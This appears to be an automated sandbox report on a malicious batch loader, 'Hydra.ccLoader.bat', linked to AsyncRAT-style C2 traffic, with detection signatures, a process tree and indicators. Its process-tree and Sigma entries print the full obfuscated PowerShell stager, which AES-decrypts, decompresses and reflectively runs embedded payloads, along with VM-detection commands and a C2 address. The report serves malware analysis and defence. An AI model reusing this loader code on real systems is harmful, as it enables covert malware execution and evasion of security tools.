Edit tour

Windows Analysis Report
Hydra.ccLoader.bat

Overview

General Information

Sample name:	Hydra.ccLoader.bat
Analysis ID:	1573922
MD5:	98347650099e648660cec15b17dbd5c0
SHA1:	c3162c64614f82d20587a1c0a2753c8b616884b7
SHA256:	39fa01d351c5cdb6de9c4155f0c7d4241578ea02e5fc735c19faae312487dc20
Tags:	batuser-smica83
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found large BAT file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Suspicious command line found

Suspicious powershell command line found

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3588 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 4348 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 6892 cmdline: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 2344 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

dllhost.exe (PID: 6140 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

dllhost.exe (PID: 2044 cmdline: C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

svchost.exe (PID: 1872 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

spoolsv.exe (PID: 2216 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)

lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1852 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1976 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1992 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1736 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 4016 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2156 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 1268 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 2104 cmdline: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 4412 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 4412	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x40aff6:$b2: ::FromBase64String( 0x4c0631:$b2: ::FromBase64String( 0x4c068f:$b2: ::FromBase64String( 0x530521:$b2: ::FromBase64String( 0x530fcd:$b2: ::FromBase64String( 0x31f452:$s1: -join 0x32b487:$s1: -join 0x4ba899:$s1: -join 0x4bd147:$s3: Reverse 0x616e4a:$s3: Reverse 0x3209f0:$s4: += 0x3231e1:$s4: += 0x323260:$s4: += 0x32347b:$s4: += 0x3234fe:$s4: += 0x323f58:$s4: += 0x324351:$s4: += 0x327d52:$s4: += 0x327d71:$s4: += 0x327dac:$s4: += 0x327dc9:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); , CommandLine: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Obj

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); , CommandLine: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Obj

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4412, TargetFilename: C:\Windows\$nya-onimai2\MzWhoQ.exe

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\System32\svchost.exe, QueryName: ipwho.is

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 6140, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 2344, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T18:02:48.092535+0100	2035595	1	Domain Observed Used for C2 Detected	135.125.21.87	4782	192.168.2.7	49816	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.2% probability

Machine Learning detection for dropped file

Source: C:\Windows\$nya-onimai2\MzWhoQ.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.7:49828 version: TLS 1.2

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
